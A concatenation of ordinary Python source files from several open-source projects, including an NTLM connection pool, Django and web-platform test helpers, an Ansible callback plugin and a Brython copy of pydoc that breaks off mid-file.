ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
self.user,
self.domain,
self.pw,
NegotiateFlags)
headers[req_header] = 'NTLM %s' % auth_msg
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', dict(res.getheaders()))
log.debug('Response data: %s [...]', res.read()[:100])
if res.status != 200:
if res.status == 401:
raise Exception('Server rejected request: wrong '
'username or password')
raise Exception('Wrong server response: %s %s' %
(res.status, res.reason))
res.fp = None
log.debug('Connection established')
return conn
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True):
if headers is None:
headers = {}
headers['Connection'] = 'Keep-Alive'
return super(NTLMConnectionPool, self).urlopen(method, url, body,
headers, retries,
redirect,
assert_same_host)
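# Example usage (hedged sketch; host, credentials and path are placeholders):
#
#   pool = NTLMConnectionPool('DOMAIN\\user', 'secret', '/ntlm-protected',
#                             host='example.com')
#   response = pool.urlopen('GET', '/ntlm-protected')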
|
stevenewey/django
|
refs/heads/master
|
tests/urlpatterns_reverse/included_urls.py
|
452
|
from django.conf.urls import url
from .views import empty_view
urlpatterns = [
url(r'^$', empty_view, name="inner-nothing"),
url(r'^extra/(?P<extra>\w+)/$', empty_view, name="inner-extra"),
url(r'^(?P<one>[0-9]+)|(?P<two>[0-9]+)/$', empty_view, name="inner-disjunction"),
]
|
eduardocereto/pyboleto
|
refs/heads/master
|
pyboleto/django/views.py
|
6027
|
# Create your views here.
|
OPM/opm-common
|
refs/heads/master
|
python/pybind11/pybind11/_version.py
|
10
|
version_info = (2, 3, 0)
__version__ = '.'.join(map(str, version_info))
|
brendandahl/servo
|
refs/heads/master
|
tests/wpt/css-tests/tools/pywebsocket/src/test/testdata/handlers/sub/wrong_transfer_sig_wsh.py
|
499
|
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Wrong web_socket_transfer_data() signature.
"""
def web_socket_do_extra_handshake(request):
pass
def no_web_socket_transfer_data(request):
request.connection.write(
'sub/wrong_transfer_sig_wsh.py is called for %s, %s' %
(request.ws_resource, request.ws_protocol))
# vi:sts=4 sw=4 et
|
bastimeyer/streamlink
|
refs/heads/master
|
src/streamlink/plugin/api/mapper.py
|
7
|
from functools import partial
from itertools import product
from operator import eq
class StreamMapper(object):
"""The stream mapper can be used to simplify the process of creating
stream objects from data.
:param cmp: This callable is used to compare each mapping's key
with a value.
"""
def __init__(self, cmp=eq):
self._map = []
self._cmp = cmp
def map(self, key, func, *args, **kwargs):
"""Creates a key-function mapping.
The return value from the function should be either
- A tuple containing a name and stream
- An iterator of tuples containing a name and stream
Any extra arguments will be passed to the function.
"""
self._map.append((key, partial(func, *args, **kwargs)))
def _cmp_filter(self, args):
value, (key, func) = args
return self._cmp(key, value)
def _mapped_func(self, args):
value, (key, func) = args
return func(value)
def __call__(self, values):
"""Runs through each value and transform it with a mapped function."""
values = product(values, self._map)
for value in map(self._mapped_func, filter(self._cmp_filter, values)):
if isinstance(value, tuple) and len(value) == 2:
yield value
else:
try:
if isinstance(value, dict):
for __ in value.items():
yield __
else:
for __ in value:
yield __
except TypeError:
# Non-iterable returned
continue
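# Example usage (hedged sketch, not part of this module; the stream
# placeholders are made up):
#
#   mapper = StreamMapper()
#   mapper.map("hls", lambda fmt: ("live", "<HLSStream>"))
#   mapper.map("http", lambda fmt: ("vod", "<HTTPStream>"))
#   dict(mapper(["hls"]))  # -> {"live": "<HLSStream>"}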
|
thnee/ansible
|
refs/heads/devel
|
lib/ansible/plugins/callback/skippy.py
|
83
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: skippy
callback_type: stdout
requirements:
- set as main display callback
short_description: Ansible screen output that ignores skipped status
version_added: "2.0"
deprecated:
why: The 'default' callback plugin now supports this functionality
removed_in: '2.11'
alternative: "'default' callback plugin with 'display_skipped_hosts = no' option"
extends_documentation_fragment:
- default_callback
description:
- This callback does the same as the default except it does not output skipped host/task/item status
'''
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
class CallbackModule(CallbackModule_default):
'''
This is the default callback interface, which simply prints messages
to stdout when new callback events are received.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'skippy'
def v2_runner_on_skipped(self, result):
pass
def v2_runner_item_on_skipped(self, result):
pass
|
grap/purchase-workflow
|
refs/heads/8.0
|
purchase_requisition_delivery_address/model/__init__.py
|
36
|
# -*- coding: utf-8 -*-
from . import purchase_requisition
|
ecoal95/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/service-workers/service-worker/resources/update-registration-with-type.py
|
21
|
def classic_script():
return """
importScripts('./imported-classic-script.js');
self.onmessage = e => {
e.source.postMessage(imported);
};
"""
def module_script():
return """
import * as module from './imported-module-script.js';
self.onmessage = e => {
e.source.postMessage(module.imported);
};
"""
# Returns the classic script for the first request and
# returns the module script for second and subsequent requests.
def main(request, response):
headers = [('Content-Type', 'application/javascript'),
('Pragma', 'no-store'),
('Cache-Control', 'no-store')]
classic_first = request.GET['classic_first']
key = request.GET['key']
requested_once = request.server.stash.take(key)
if requested_once is None:
request.server.stash.put(key, True)
body = classic_script() if classic_first == '1' else module_script()
else:
body = module_script() if classic_first == '1' else classic_script()
return 200, headers, body
|
tboyce021/home-assistant
|
refs/heads/dev
|
homeassistant/components/blueprint/__init__.py
|
3
|
"""The blueprint integration."""
from . import websocket_api
from .const import DOMAIN # noqa
from .errors import ( # noqa
BlueprintException,
BlueprintWithNameException,
FailedToLoad,
InvalidBlueprint,
InvalidBlueprintInputs,
MissingInput,
)
from .models import Blueprint, BlueprintInputs, DomainBlueprints # noqa
from .schemas import is_blueprint_instance_config # noqa
async def async_setup(hass, config):
"""Set up the blueprint integration."""
websocket_api.async_setup(hass)
return True
|
bmi-forum/bmi-pyre
|
refs/heads/master
|
pythia-0.8/packages/blade/blade/components/__init__.py
|
2
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# version
__id__ = "$Id: __init__.py,v 1.1.1.1 2005/03/08 16:13:56 aivazis Exp $"
# End of file
|
40223150/2015cd_0505
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/pydoc.py
|
637
|
#!/usr/bin/env python3
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import builtins
import imp
import importlib.machinery
#brython fix me
import inspect
import io
import os
#brython fix me
import pkgutil  # referenced below by iter_modules() and walk_packages()
import platform
import re
import sys
import time
import tokenize
import warnings
from collections import deque
from reprlib import Repr
#fix me brython
#from traceback import extract_tb, format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
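# Illustrative sketch (not part of the original module): the first line counts
# as the synopsis only when the following line is blank.
def _demo_splitdoc():
    synopsis_line, rest = splitdoc('Summary.\n\nDetails here.')
    assert synopsis_line == 'Summary.'
    assert rest == 'Details here.'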
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
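# Illustrative sketch (not part of the original module): cram() keeps the head
# and tail of an over-long string and marks the elision with '...'.
def _demo_cram():
    assert cram('abcdefghijklmnop', 10) == 'abc...mnop'
    assert cram('short', 10) == 'short'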
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
#fix me brython
#return _re_stripid.sub(r'\1', text)
return text
def _is_some_method(obj):
return (inspect.isfunction(obj) or
inspect.ismethod(obj) or
inspect.isbuiltin(obj) or
inspect.ismethoddescriptor(obj))
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant or internal.
if name in {'__author__', '__builtins__', '__cached__', '__credits__',
'__date__', '__doc__', '__file__', '__initializing__',
'__loader__', '__module__', '__name__', '__package__',
'__path__', '__qualname__', '__slots__', '__version__'}:
return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return True
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
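# Illustrative sketch (not part of the original module): how visiblename()
# filters names, and how an explicit __all__ overrides the heuristics.
def _demo_visiblename():
    assert visiblename('__doc__') == 0          # redundant special name
    assert visiblename('__init__') == 1         # other dunders are shown
    assert not visiblename('_private')          # leading underscore hidden
    assert visiblename('shown', all=['shown'])  # __all__ wins when given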
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
try:
file = tokenize.open(filename)
except IOError:
# module can't be opened, so skip it
return None
binary_suffixes = importlib.machinery.BYTECODE_SUFFIXES[:]
binary_suffixes += importlib.machinery.EXTENSION_SUFFIXES[:]
if any(filename.endswith(x) for x in binary_suffixes):
# binary modules have to be imported
file.close()
if any(filename.endswith(x) for x in
importlib.machinery.BYTECODE_SUFFIXES):
loader = importlib.machinery.SourcelessFileLoader('__temp__',
filename)
else:
loader = importlib.machinery.ExtensionFileLoader('__temp__',
filename)
try:
module = loader.load_module('__temp__')
except:
return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else:
# text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
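# Illustrative sketch (not part of the original module): synopsis() extracts
# the one-line summary of a source file, caching it keyed on the file's mtime.
def _demo_synopsis():
    import tempfile
    fd, path = tempfile.mkstemp(suffix='.py')
    os.close(fd)
    with open(path, 'w') as f:
        f.write('"""One-line summary."""\n')
    try:
        return synopsis(path)  # -> 'One-line summary.'
    finally:
        os.unlink(path)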
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
with open(path, 'rb') as file:
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.seek(0)
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
#fix me brython
#elif exc is ImportError and value.name == path:
elif exc is ImportError and str(value) == str(path):
# No such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.base_exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
        return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
    ''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;')
def section(self, title, fgcol, bgcol, contents, width=6,
                prelude='', marginalia=None, gap='&nbsp;'):
        """Format a section with a heading."""
        if marginalia is None:
            marginalia = '<tt>' + '&nbsp;' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
        return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
                             ' ', '&nbsp;', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
                url = escape(all).replace('"', '&quot;')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
('.'.join(parts[:i+1]), parts[i]))
linkedname = '.'.join(links + parts[-1:])
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = self.filelink(url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % ', '.join(info)
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda t: self.modulelink(t[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = [value for (key, value) in classes]
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', ' '.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', ' '.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', '<br>\n'.join(contents))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
